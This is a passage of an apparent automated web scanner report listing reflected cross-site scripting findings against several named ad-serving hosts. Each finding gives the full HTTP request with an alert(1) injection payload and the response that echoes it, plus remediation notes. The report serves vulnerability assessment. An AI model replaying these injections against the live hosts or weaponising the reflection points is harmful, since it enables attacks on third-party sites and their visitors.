Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 309
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:50:16 GMT
Expires: Wed, 11 May 2011 15:50:16 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/l;44306;0-0;0;15718924;11962-2000/2000;0/0/0;;~okv=;;ptype=2fa86';alert(1)//c80a0abda8b;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.83. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/hp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82195'-alert(1)-'e068592360b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/hp;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/;ord=85014959?&82195'-alert(1)-'e068592360b=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 15:51:23 GMT
Content-Length: 415

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/l;44306;0-0;0;15718924;31-1/1;0/0/0;u=http://www.zap2it.com/;~okv=;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/;;82195'-alert(1)-'e068592360b=1;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.84. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [dcopt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The value of the dcopt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb7bc'%3balert(1)//6f033fcceaa was submitted in the dcopt parameter. This input was echoed as cb7bc';alert(1)//6f033fcceaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/people;dcopt=cb7bc'%3balert(1)//6f033fcceaa HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 308
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:55:15 GMT
Expires: Wed, 11 May 2011 15:55:15 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/s;44306;0-0;0;36640566;11962-2000/2000;0/0/0;;~okv=;dcopt=cb7bc';alert(1)//6f033fcceaa;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.85. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b330e'%3balert(1)//fe88cd33852 was submitted in the pos parameter. This input was echoed as b330e';alert(1)//fe88cd33852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/people;pos=b330e'%3balert(1)//fe88cd33852 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 306
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:55:03 GMT
Expires: Wed, 11 May 2011 15:55:03 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/s;44306;0-0;0;36640566;11962-2000/2000;0/0/0;;~okv=;pos=b330e';alert(1)//fe88cd33852;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.86. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 146c0'%3balert(1)//ade7a5b4c14 was submitted in the sz parameter. This input was echoed as 146c0';alert(1)//ade7a5b4c14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/people;sz=146c0'%3balert(1)//ade7a5b4c14 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:55:33 GMT
Expires: Wed, 11 May 2011 15:55:33 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/s;44306;0-0;0;36640566;11962-2000/2000;0/0/0;;~okv=;sz=146c0';alert(1)//ade7a5b4c14;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.87. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [rs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/video

Issue detail

The value of the rs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7e74'%3balert(1)//8332e3237ee was submitted in the rs parameter. This input was echoed as e7e74';alert(1)//8332e3237ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.zap2it/ntl/video;rs=e7e74'%3balert(1)//8332e3237ee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/videobeta/watch/?watch=46b4b96c-d010-456a-8c9a-8848a32e31e3&cat=a2b03c2b-b892-4e41-8a2b-c09f9d4d5ff5&src=front
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:56:22 GMT
Expires: Wed, 11 May 2011 15:56:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/n;44306;0-0;0;23181940;11962-2000/2000;0/0/0;;~okv=;rs=e7e74';alert(1)//8332e3237ee;~aopt=2/1/880a/1;~sscs=%3f">
...[SNIP]...

5.88. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da183"><script>alert(1)</script>d968ef71f8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D&da183"><script>alert(1)</script>d968ef71f8d=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh="1lkkxr8160852rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; clid=2ljtllp01170xrd52zkwjuxh17s3u01m3n050k0p518; rdrlst=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; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00o3n050k0o50oarllkxlm503s3e00o3n050k0o50ocg5lkxlm5026sw00o3n050k0o50o9rslkkpke0go550163n050k0p516am5lkkxr8002zw00z3n050k0p50zcd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00o3n050k0o50ocnolkxlm5026sw00o3n050k0o50oabelkxlm5026sw00o3n050k0o50odd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00o3n050k0o50oaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00o3n050k0o50oe3qll1dpj000000013n010k01501bq3lkxlm5026sw00o3n050k0o50obvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00o3n050k0o50oc5flkxlm5026sw00o3n050k0o50o56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00o3n050k0o50oawklkxlm5026sw00o3n050k0o50oasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00o3n050k0o50oc5rlkov6e0000000r3n050k0p50raw8lkxlm503s3e00o3n050k0o50oc60lkxlm5026sw00o3n050k0o50odc4lkxlm5026sw00o3n050k0o50od26lkxlm5026sw00o3n050k0o50odnjlkxlm503s3e00o3n050k0o50ocbclkxlm5026sw00o3n050k0o50oc85lkxlm5026sw00o3n050k0o50ocsslkxlm503s3e00o3n050k0o50oc80lkb5u209jqc0063e000j00500ag2lkd7nq0o61t01b3n050k0p518c1elkxlm5026sw00o3n050k0o50oc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00o3n050k0o50oc8flkxlm5026sw00o3n050k0o50oa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00o3n050k0o50o9z6lkxlm5026sw00o3n050k0o50odbtlkxlm5026sw00o3n050k0o50o9q4lkxlm5026sw00o3n050k0o50odyllkxlm5026sw00o3n050k0o50o0kllklhm40c4010053l000k005009q5lk
b5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gef01j3n050k0p518dgflkkpke0f2un0163n050k0p5169mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00o3n050k0o50ocwalkxlm5026sw00o3n050k0o50od86lklhm40c4010053l000k00500d84lkxlm5026sw00o3n050k0o50odqllkxlm5026sw00o3n050k0o50odz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00o3n050k0o50ocxdlkxlm503s3e00o3n050k0o50o719lkb5u20omkz00u3n050k0o50p71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00o3n050k0o50occ3lkxlm5026sw00o3n050k0o50odgilkb5u209jqc0063e000j00500cthlkxlm5026sw00o3n050k0o50o4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000013n010k01501bwjlkkyy00gerj00x3n050k0p50xcbplkxlm5026sw00o3n050k0o50o9gelkxlm503s3e00n3n000k00500; vstcnt=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160952rf011et018qzlZAsw500gi2t52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:49 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u8c01n3n060k0q519; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:49 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 11 May 2011 15:46:48 GMT
Content-Length: 2991

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=58
...[SNIP]...
9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D&da183"><script>alert(1)</script>d968ef71f8d=1;ord=1305128809439">
...[SNIP]...

5.89. http://ad.media6degrees.com/adserv/cs [tId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a55c"><script>alert(1)</script>2825b35e074 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?tId=17076761397480505|cb=1305126201|adType=iframe|cId=5806|ec=1|spId=32352|advId=891|exId=20|price=TcqlOAAMd9kK5V2jQjwM_tBIgk23wvxbGO4ENg|pubId=400|secId=57|invId=1829|notifyServer=asd155.sd.pl.pvt|notifyPort=8080|bid=1.83|srcUrlEnc=http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/|ctrack=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBqrptOKXKTdnvMaO7lQf-mfCRBP-unYMC5-rKljCf_6ONYAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGLgMjrA7IBEXd3dy5zdGFycHVsc2UuY29tugEJNzI4eDkwX2FzyAEJ2gE8aHR0cDovL3d3dy5zdGFycHVsc2UuY29tL0NvbnRlc3RzL0Zhc3RfRml2ZV9Qcml6ZV9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D6a55c"><script>alert(1)</script>2825b35e074 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160952rf011et018qzlZAsw500gi2e52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17u7x01n3n060k0q519; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724eyja103210e24f204103210524na8i103210e24mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924o3dr103210l24bgpn103210524cj2d103210224gqhl103210924e1a9103210l23sti21hj10a203210e24d3rk10pj10m24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24dret103210724uzdp103210b24e9pa103210424cnyl103210g24styu10321092451gt10pj10e24er21103210m24fj52103210924o2lt103210a23eoh127p10l24m1v2103210a24f7qr218e108203210924qnab103210024fgv9218e108203210a24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 15:46:34 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 11 May 2011 15:46:34 GMT
Content-Length: 2982

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4;sz=728x90;pc=[TPAS_ID];click0=http://ad.media6degrees.com/adserv/clk?tId=17076761397480505|cId=58
...[SNIP]...
V9QYWNrLzU2MjcvmALyDMACBcgC0dHPDOACAOoCDENvbnRlc3RzLTcyOKgDAegDROgDjwfoA-AH9QMAAADE4AQBgAb8-MD-7bDXrCI%26num%3D1%26sig%3DAGiWqtwAxkWGQiJelWcUNQXgzlTbn5P7nQ%26client%3Dca-pub-9674942009345807%26adurl%3D6a55c"><script>alert(1)</script>2825b35e074;ord=1305128794280">
...[SNIP]...

5.90. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99928"-alert(1)-"f8c37699d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tent=ch&tlfs=ch&tmen=ch&tphv=ch&tspt=ch&tclb=ch&rtg=ga&brw=cr3&os=wn7&prm=1&efo=0&atf=0&uatRandNo=56968&ad_type=ad&section=1406776&ad_size=300x250&cb=9939601230&99928"-alert(1)-"f8c37699d8=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:02 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:02 GMT
Pragma: no-cache
Content-Length: 4450
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?99928"-alert(1)-"f8c37699d8=1&Z=300x250&atf=0&brw=cr3&cb=9939601230&efo=0&os=wn7&pfm=1&prm=1&rtg=ga&s=1406776&tclb=ch&tent=ch&tlfs=ch&tmen=ch&tphv=ch&tspt=ch&uatRandNo=56968&_salt=263683752";var RM_POP_COOKIE_NAME='ym_pop_freq';
...[SNIP]...

5.91. http://ad.turn.com/server/bid/fan.bid [requestId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/bid/fan.bid

Issue detail

The value of the requestId request parameter is copied into the HTML document as plain text between tags. The payload 66103<script>alert(1)</script>0f833ad4bfb was submitted in the requestId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/bid/fan.bid?pub=10063193&cch=10063206&l=300x250&requestId=C1Qs4Xi5Px9F.b2Qs4Xi5Px9F66103<script>alert(1)</script>0f833ad4bfb&ref=http%3A%2F%2Ffan-nonugc-foxaudiencenetwork.com&rand=1305125955287 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=7681b4f5-7a3b-407a-961f-c43e051f5d06&sz=300x250&neg=&ega=&puid=&rnd=9947336
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 1059
Date: Wed, 11 May 2011 15:23:30 GMT

C1Qs4Xi5Px9F.b2Qs4Xi5Px9F66103<script>alert(1)</script>0f833ad4bfb={"result":{"cpm":1520,"ad":"http://ad.turn.com/server/ads.js?pub=10063193&cch=10063206&code=10065709&l=300x250&aid=25922484&ahcid=1092353&bimpd=7nA0ClRWctcybjplXNzfV97_Ey90AjyntQ8HezALd79hhdMlBZP_el1B
...[SNIP]...

5.92. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

